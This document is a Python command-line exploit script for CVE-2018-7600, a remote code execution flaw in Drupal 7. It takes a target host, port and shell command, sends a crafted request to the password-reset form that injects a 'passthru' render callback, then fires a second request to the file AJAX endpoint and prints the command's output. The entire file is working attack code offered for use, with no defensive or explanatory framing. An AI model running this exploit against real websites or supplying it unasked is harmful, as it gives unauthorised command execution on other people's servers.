import sys
import requests
import getopt
from bs4 import BeautifulSoup

URL = '?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]='
PAYLOAD = {'form_id':'user_pass', '_triggering_element_name':'name'}
SECOND_URL = "?q=file/ajax/name/%23value/"
DEFAULT_PORT = 80

def usage():
    print("CVE-2018-7600 Remote Code Execution in drupal 7")
    print()
    print("Flags:")
    print("{} - Target url".format("\t-t --target".ljust(20," ")))
    print("{} - Port of webserver".format("\t-p --port".ljust(20," ")))
    print("{} - Command to be executed".format("\t-c --command".ljust(20," ")))
    print()


def main():
    if len(sys.argv) > 1:
        try: 
            opts,args = getopt.getopt(sys.argv[1:],"t:p:c:",["target","port","command"])
        except getopt.GetoptError as e:
            print(str(e))
            usage()
            sys.exit(1)
        target = None
        command = None 
        port = DEFAULT_PORT
        for o,a in opts:
            if o in ("-t","--target"):
                target = a
            elif o in ("-c","--comand"):
                command = a
            elif o in ("-p","--port"):
                try:
                    port = int(a)
                except ValueError:
                    print("[!] Invalid port provided, must be an int")
                    sys.exit(1)
            else:
                print("[!] Invalid option {}".format(o))

    else:
        print("[!] Must provide target url and command")
        sys.exit(1)

    quit = False

    if target is None:
        print("[!] Must provide target with -t or --target")
        quit = True

    if command is None:
        print("[!] Must provide command with -c or --command")
        quit = True

    if quit:
        sys.exit(1)

    print("[+] Sending command exploit")
    r = requests.post("http://{}:{}{}{}".format(target, port, URL, command), data=PAYLOAD)

    soup = BeautifulSoup(r.text, "html.parser")

    try:
        print("[+] Prepping trigger")

        target_form = soup.find('form', {'id':'user-pass'})
        form_build_id = target_form.find('input', {'name':'form_build_id'}).get('value')
        second_payload = {'form_build_id':form_build_id}

        print("[+] Sending trigger")

        trigger = requests.post("http://{}:{}{}{}".format(target, port, SECOND_URL, form_build_id), data=second_payload)
        result = trigger.text.split('[{"command":"settings"')[0]
        
        print("[+] Result: {}".format(result))
    except:
        print("[!] Error in html parsing")
        sys.exit(1)


if __name__ ==  '__main__':
    main()